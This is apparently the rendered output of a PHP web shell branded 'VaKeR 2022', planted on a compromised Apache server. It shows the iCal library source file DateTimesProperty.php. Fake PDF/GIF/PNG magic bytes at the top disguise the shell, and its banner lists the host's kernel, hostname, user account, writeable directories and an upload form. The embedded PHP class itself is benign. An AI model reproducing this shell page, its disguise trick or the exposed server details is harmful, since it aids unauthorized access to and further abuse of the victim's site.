%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/www/admin1/vendor/eluceo/ical/src/Property/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/www/admin1/vendor/eluceo/ical/src/Property/DateTimesProperty.php
<?php

/*
 * This file is part of the eluceo/iCal package.
 *
 * (c) Markus Poerschke <markus@eluceo.de>
 *
 * This source file is subject to the MIT license that is bundled
 * with this source code in the file LICENSE.
 */

namespace Eluceo\iCal\Property;

use Eluceo\iCal\Property;
use Eluceo\iCal\Util\DateUtil;

class DateTimesProperty extends Property
{
    /**
     * @param string               $name
     * @param \DateTimeInterface[] $dateTimes
     * @param bool                 $noTime
     * @param bool                 $useTimezone
     * @param bool                 $useUtc
     * @param string               $timezoneString
     */
    public function __construct(
        $name,
        $dateTimes = [],
        $noTime = false,
        $useTimezone = false,
        $useUtc = false,
        $timezoneString = ''
    ) {
        $dates = [];
        $dateTime = new \DateTimeImmutable();
        foreach ($dateTimes as $dateTime) {
            $dates[] = DateUtil::getDateString($dateTime, $noTime, $useTimezone, $useUtc);
        }

        //@todo stop this triggering an E_NOTICE when $dateTimes is empty
        $params = DateUtil::getDefaultParams($dateTime, $noTime, $useTimezone, $timezoneString);

        parent::__construct($name, $dates, $params);
    }
}

VaKeR 2022